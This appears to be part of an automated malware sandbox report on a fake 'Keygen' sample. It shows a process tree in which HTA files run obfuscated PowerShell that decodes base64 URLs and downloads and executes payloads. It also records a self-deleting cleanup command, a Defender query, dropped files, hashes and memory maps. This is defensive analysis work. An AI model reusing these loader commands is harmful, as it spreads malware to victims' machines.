@($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3768
                • C:\Users\Public\ywk.exe
                  "C:\Users\Public\ywk.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4916
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                    6⤵
                      PID:2672
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5076
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                            PID:4408
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2480
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:3412
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:2680
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            8⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:1800
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1800 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\585238669797089\\* & exit
                              9⤵
                                PID:1144
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 1800
                                  10⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4680
                        • C:\Users\Public\ywk.exe
                          "C:\Users\Public\ywk.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4132
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3108.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3500
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3860
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 2
                    3⤵
                    • Delays execution with timeout.exe
                    PID:3536
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3108.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4292
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4368
                      • C:\Users\Public\onv.exe
                        "C:\Users\Public\onv.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:4120
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:1648
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:4328
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 4328 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\439395038369854\\* & exit
                              8⤵
                                PID:4100
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 4328
                                  9⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1948
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:1652
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:4800
                          • C:\Users\Public\onv.exe
                            "C:\Users\Public\onv.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:3928
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3108.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4436
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4544
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  1⤵
                    PID:4836
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c start C:\Windows\temp\lhiieznp.exe
                      2⤵
                        PID:4412
                        • C:\Windows\temp\lhiieznp.exe
                          C:\Windows\temp\lhiieznp.exe
                          3⤵
                          • Executes dropped EXE
                          PID:2296
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4656
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /IM cmstp.exe /F
                        2⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4940

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\freebl3.dll

                    • C:\ProgramData\freebl3.dll

                    • C:\ProgramData\mozglue.dll

                    • C:\ProgramData\mozglue.dll

                    • C:\ProgramData\msvcp140.dll

                    • C:\ProgramData\msvcp140.dll

                    • C:\ProgramData\nss3.dll

                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\softokn3.dll

                    • C:\ProgramData\softokn3.dll

                    • C:\ProgramData\sqlite3.dll

                    • C:\ProgramData\sqlite3.dll

                    • C:\ProgramData\vcruntime140.dll

                    • C:\ProgramData\vcruntime140.dll

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\Keygen.exe

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\Keygen.exe

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\b.hta

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\b1.hta

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\ba.hta

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\ba1.hta

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\m.hta

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\m1.hta

                    • C:\Users\Admin\AppData\Local\Temp\3108.tmp\start.bat

                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs

                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe

                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe

                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe

                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe

                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe

                    • C:\Users\Admin\AppData\Local\Temp\HW21Tz5VHS.exe

                    • C:\Users\Admin\AppData\Local\Temp\HW21Tz5VHS.exe

                    • C:\Users\Admin\AppData\Local\Temp\I9Hk6nm4Ii.exe

                    • C:\Users\Admin\AppData\Local\Temp\I9Hk6nm4Ii.exe

                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe

                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe

                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe

                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe

                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe

                    • C:\Users\Admin\AppData\Local\Temp\O9nHlj8W0j.exe

                    • C:\Users\Admin\AppData\Local\Temp\O9nHlj8W0j.exe

                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs

                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe

                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe

                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe

                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe

                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe

                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe

                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe

                    • C:\Users\Admin\AppData\Local\Temp\vuKJHBh5Ry.exe

                    • C:\Users\Admin\AppData\Local\Temp\vuKJHBh5Ry.exe

                    • C:\Users\Public\bny.exe

                    • C:\Users\Public\bny.exe

                    • C:\Users\Public\bny.exe

                    • C:\Users\Public\onv.exe

                    • C:\Users\Public\onv.exe

                    • C:\Users\Public\onv.exe

                    • C:\Users\Public\ywk.exe

                    • C:\Users\Public\ywk.exe

                    • C:\Users\Public\ywk.exe

                    • C:\Windows\Temp\lhiieznp.exe

                      MD5

                      f4b5c1ebf4966256f52c4c4ceae87fb1

                      SHA1

                      ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                      SHA256

                      88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                      SHA512

                      02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                    • C:\Windows\temp\lhiieznp.exe

                      MD5

                      f4b5c1ebf4966256f52c4c4ceae87fb1

                      SHA1

                      ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                      SHA256

                      88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                      SHA512

                      02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                    • C:\Windows\temp\pvm1z3b2.inf

                    • \ProgramData\mozglue.dll

                    • \ProgramData\mozglue.dll

                    • \ProgramData\mozglue.dll

                    • \ProgramData\nss3.dll

                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll

                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll

                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\sqlite3.dll

                    • \ProgramData\sqlite3.dll

                    • \ProgramData\sqlite3.dll

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll

                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll

                    • \Users\Admin\AppData\LocalLow\sqlite3.dll

                    • memory/988-304-0x0000000000000000-mapping.dmp

                    • memory/1144-265-0x0000000000000000-mapping.dmp

                    • memory/1228-0-0x0000000000000000-mapping.dmp

                    • memory/1628-283-0x0000000000000000-mapping.dmp

                    • memory/1648-149-0x0000000000000000-mapping.dmp

                    • memory/1652-150-0x0000000000000000-mapping.dmp

                    • memory/1792-2-0x0000000000000000-mapping.dmp

                    • memory/1792-3-0x0000000000000000-mapping.dmp

                    • memory/1800-242-0x0000000000400000-0x0000000000434000-memory.dmp

                      Filesize

                      208KB

                    • memory/1800-240-0x0000000000417A8B-mapping.dmp

                    • memory/1800-239-0x0000000000400000-0x0000000000434000-memory.dmp

                      Filesize

                      208KB

                    • memory/1892-22-0x00000000072C0000-0x00000000072C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-35-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-32-0x0000000007B80000-0x0000000007B81000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-38-0x0000000007C80000-0x0000000007C81000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-18-0x0000000006C50000-0x0000000006C51000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-73-0x0000000009130000-0x0000000009131000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-70-0x0000000009B80000-0x0000000009B81000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-14-0x0000000070C40000-0x000000007132E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/1892-13-0x0000000000000000-mapping.dmp

                    • memory/1948-225-0x0000000000000000-mapping.dmp

                    • memory/2120-7-0x0000000000000000-mapping.dmp

                    • memory/2296-345-0x0000000000D80000-0x0000000000D81000-memory.dmp

                      Filesize

                      4KB

                    • memory/2296-338-0x0000000000000000-mapping.dmp

                    • memory/2296-340-0x0000000000000000-mapping.dmp

                    • memory/2296-343-0x00007FFAC2E00000-0x00007FFAC37EC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/2420-10-0x0000000000000000-mapping.dmp

                    • memory/2480-269-0x00000000050C0000-0x00000000050E4000-memory.dmp

                      Filesize

                      144KB

                    • memory/2480-246-0x0000000071FB0000-0x000000007269E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/2480-244-0x0000000000000000-mapping.dmp

                    • memory/2480-247-0x0000000000780000-0x0000000000781000-memory.dmp

                      Filesize

                      4KB

                    • memory/2480-249-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2672-207-0x0000000000000000-mapping.dmp

                    • memory/2976-9-0x0000000000000000-mapping.dmp

                    • memory/3412-275-0x0000000000400000-0x0000000000420000-memory.dmp

                      Filesize

                      128KB

                    • memory/3412-273-0x000000000041A684-mapping.dmp

                    • memory/3412-272-0x0000000000400000-0x0000000000420000-memory.dmp

                      Filesize

                      128KB

                    • memory/3500-21-0x0000000000000000-mapping.dmp

                    • memory/3536-24-0x0000000000000000-mapping.dmp

                    • memory/3676-17-0x0000000000000000-mapping.dmp

                    • memory/3748-213-0x0000000000000000-mapping.dmp

                    • memory/3760-326-0x0000000005A20000-0x0000000005A23000-memory.dmp

                      Filesize

                      12KB

                    • memory/3760-308-0x0000000001700000-0x0000000001711000-memory.dmp

                      Filesize

                      68KB

                    • memory/3760-300-0x0000000000E30000-0x0000000000E31000-memory.dmp

                      Filesize

                      4KB

                    • memory/3760-298-0x0000000071FB0000-0x000000007269E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/3760-292-0x0000000000000000-mapping.dmp

                    • memory/3760-303-0x00000000015F0000-0x00000000015F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3768-98-0x0000000009050000-0x0000000009051000-memory.dmp

                      Filesize

                      4KB

                    • memory/3768-99-0x000000000A4B0000-0x000000000A4B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3768-97-0x0000000009830000-0x0000000009831000-memory.dmp

                      Filesize

                      4KB

                    • memory/3768-34-0x0000000070C40000-0x000000007132E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/3768-26-0x0000000000000000-mapping.dmp

                    • memory/3828-12-0x0000000000000000-mapping.dmp

                    • memory/3828-28-0x00000000076E0000-0x00000000076E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3828-56-0x00000000088B0000-0x00000000088B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3828-15-0x0000000070C40000-0x000000007132E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/3860-25-0x0000000000000000-mapping.dmp

                    • memory/3860-52-0x0000000007C30000-0x0000000007C31000-memory.dmp

                      Filesize

                      4KB

                    • memory/3860-27-0x0000000070C40000-0x000000007132E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/3860-49-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3928-158-0x000000000043FCC3-mapping.dmp

                    • memory/3928-160-0x0000000000400000-0x0000000000498000-memory.dmp

                      Filesize

                      608KB

                    • memory/4100-214-0x0000000000000000-mapping.dmp

                    • memory/4120-137-0x0000000000000000-mapping.dmp

                    • memory/4132-215-0x0000000000400000-0x0000000000493000-memory.dmp

                      Filesize

                      588KB

                    • memory/4132-216-0x000000000043FCC3-mapping.dmp

                    • memory/4132-219-0x0000000000400000-0x0000000000493000-memory.dmp

                      Filesize

                      588KB

                    • memory/4148-132-0x000000000043FCC3-mapping.dmp

                    • memory/4148-131-0x0000000000400000-0x0000000000498000-memory.dmp

                      Filesize

                      608KB

                    • memory/4148-134-0x0000000000400000-0x0000000000498000-memory.dmp

                      Filesize

                      608KB

                    • memory/4204-138-0x0000000000417A8B-mapping.dmp

                    • memory/4204-141-0x0000000000400000-0x0000000000439000-memory.dmp

                      Filesize

                      228KB

                    • memory/4204-135-0x0000000000400000-0x0000000000439000-memory.dmp

                      Filesize

                      228KB

                    • memory/4216-136-0x0000000000400000-0x0000000000425000-memory.dmp

                      Filesize

                      148KB

                    • memory/4216-145-0x0000000000400000-0x0000000000425000-memory.dmp

                      Filesize

                      148KB

                    • memory/4216-139-0x000000000041A684-mapping.dmp

                    • memory/4292-61-0x0000000000000000-mapping.dmp

                    • memory/4328-162-0x0000000000417A8B-mapping.dmp

                    • memory/4328-166-0x0000000000400000-0x0000000000439000-memory.dmp

                      Filesize

                      228KB

                    • memory/4368-63-0x0000000000000000-mapping.dmp

                    • memory/4368-66-0x0000000070C40000-0x000000007132E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/4408-235-0x0000000000000000-mapping.dmp

                    • memory/4412-334-0x0000000000000000-mapping.dmp

                    • memory/4436-65-0x0000000000000000-mapping.dmp

                    • memory/4516-220-0x0000000000000000-mapping.dmp

                    • memory/4544-69-0x0000000000000000-mapping.dmp

                    • memory/4544-77-0x0000000070C40000-0x000000007132E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/4656-352-0x0000022B4D6C0000-0x0000022B4D6C1000-memory.dmp

                      Filesize

                      4KB

                    • memory/4656-347-0x0000000000000000-mapping.dmp

                    • memory/4656-350-0x00007FFAC2E00000-0x00007FFAC37EC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/4656-351-0x0000022B4D510000-0x0000022B4D511000-memory.dmp

                      Filesize

                      4KB

                    • memory/4680-267-0x0000000000000000-mapping.dmp

                    • memory/4700-288-0x0000000000000000-mapping.dmp

                    • memory/4700-291-0x0000000071FB0000-0x000000007269E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/4700-307-0x0000000004BB0000-0x0000000004BC2000-memory.dmp

                      Filesize

                      72KB

                    • memory/4700-313-0x000000000A880000-0x000000000A885000-memory.dmp

                      Filesize

                      20KB

                    • memory/4700-296-0x0000000000370000-0x0000000000371000-memory.dmp

                      Filesize

                      4KB

                    • memory/4700-302-0x0000000004B00000-0x0000000004B01000-memory.dmp

                      Filesize

                      4KB

                    • memory/4800-165-0x000000000041A684-mapping.dmp

                    • memory/4916-205-0x0000000005810000-0x00000000058C0000-memory.dmp

                      Filesize

                      704KB

                    • memory/4916-116-0x0000000000E50000-0x0000000000E51000-memory.dmp

                      Filesize

                      4KB

                    • memory/4916-206-0x0000000005D50000-0x0000000005D51000-memory.dmp

                      Filesize

                      4KB

                    • memory/4916-212-0x0000000006A60000-0x0000000006A6D000-memory.dmp

                      Filesize

                      52KB

                    • memory/4916-105-0x0000000000000000-mapping.dmp

                    • memory/4916-111-0x0000000070C40000-0x000000007132E000-memory.dmp

                      Filesize

                      6.9MB

